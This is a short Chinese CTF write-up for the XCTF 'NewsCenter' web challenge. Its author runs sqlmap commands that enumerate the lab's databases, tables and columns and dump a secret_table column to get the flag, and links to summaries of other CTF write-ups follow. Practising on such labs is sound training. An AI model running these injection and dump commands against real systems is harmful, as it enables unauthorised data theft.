攻防世界-WEB-NewsCenter

10月前作者：Lucifer_wei 分类：Toy博客阅读(36) 违法举报

这篇具有很好参考价值的文章主要介绍了攻防世界-WEB-NewsCenter。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

打开环境

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

有查询，猜测是sql注入

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

保存请求头到文件中

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

准备利用sqlmap

查找数据库

python sqlmap.py -r ./123.txt --dbs

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

查找表

python sqlmap.py -r ./123.txt --tables -D news

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

显示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

得到flag

QCTF{sq1_inJec7ion_ezzz文章来源地址https://www.toymoban.com/news/detail-700277.html

到了这里，关于攻防世界-WEB-NewsCenter的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

攻防世界WEB练习区（backup、cookie、disabled_button）

前言作者简介：不知名白帽，网络安全学习者。博客主页：https://blog.csdn.net/m0_63127854?type=blog 攻防世界专栏：https://blog.csdn.net/m0_63127854/category_11983747.html 网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan 目录 backup 题目介绍题目思路访问靶场常见备份文件后缀名访问ind

2024年01月19日
浏览(33)
[CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码，然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。接下来，代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值，并进行字符串替换，将 php:// 替换为空字符串这是为了防止通过 URL 参数加载本地文件或其他可

2024年02月08日
浏览(48)
攻防世界ctf题目easyupload做题笔记。

刚刷完upload-labs靶场，做做ctf题目，发现自己掌握的知识并不牢固。做了半天没有解出来，最后还是看别人的题解做出来的。写下做题过程，也就是wp吧。为了方便以后复习巩固。本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行这里需要绕过的点如下检查文件内

2024年02月01日
浏览(42)
[CTF/网络安全]攻防世界 easyupload 解题详析

题目描述：一名合格的黑客眼中，所有的上传点都是开发者留下的后门惯例，上传一句话木马回显如下：也就是说文件被过滤抓包改后缀，.php1~.php9、.htaccess均被过滤（.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中，用来为该

2024年02月08日
浏览(59)
[CTF/网络安全] 攻防世界 backup 解题详析

题目描述：X老师忘记删除备份文件，他派小宁同学去把备份文件找出来,一起来帮小宁同学吧！ PHP 脚本文件的备份文件名，通常采用以下命名方式：在原始文件名后添加日期时间戳。例如，如果要备份名为 index.php 的文件，则可以将其备份文件命名为 index_20230521_004017.php。这

2024年02月05日
浏览(66)
[CTF/网络安全] 攻防世界 cookie 解题详析

题目描述：X老师告诉小宁他在cookie里放了些东西，小宁疑惑地想：这是夹心饼干的意思吗？根据提示，获取页面Cookie中的数据即可页面提示 look here:cookie.php ，于是GET /cookie.php ：提示查看HTTP响应 method 1 HTTP响应通常可以在浏览器的开发者工具中找到。按下F12键打开浏览器

2024年02月05日
浏览(46)
[CTF/网络安全] 攻防世界 PHP2 解题详析

翻译：你能给这个网站进行身份验证吗？ index.php是一个常见的文件名，通常用于Web服务器中的网站根目录下。它是默认的主页文件名，在访问一个网站时，如果没有特别指定页面文件名，则服务器会自动加载index.php文件。在Web应用程序中，index.php文件通常是网站的入口文件

2024年02月13日
浏览(48)
[CTF/网络安全] 攻防世界 view_source 解题详析

题目描述：X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。单击鼠标右键，点击查看页面源代码：使用浏览器菜单：不同的浏览器可能会在不同的位置提供查看页面源代码的选项。以Firefox为例，打开应用程序菜单即可：使用快捷键：几乎

2024年02月13日
浏览(58)
[CTF/网络安全] 攻防世界 wife_wife 解题详析

该题涉及Java Script原型链污染：JavaScript 原型链污染讲解可以看到，后端编程语言为Node.js，简单来讲，通过 newUser.__proto__ 可以访问到新对象的原型未污染时：污染时：我们以知识点的利用为主，查看源代码：若isAdmin的属性是true，则它为管理员，否则为普通用户；于是我

2024年02月06日
浏览(50)
[CTF/网络安全] 攻防世界 disabled_button 解题详析

题目描述：X老师今天上课讲了前端知识，然后给了大家一个不能按的按钮，小宁惊奇地发现这个按钮按不下去，到底怎么才能按下去呢？题目提示前端知识，由HTML相关知识可知，该按钮即input标签不能提交的原因有以下六种：没有包含在表单中： input 标签必须包含在表

2024年02月07日
浏览(59)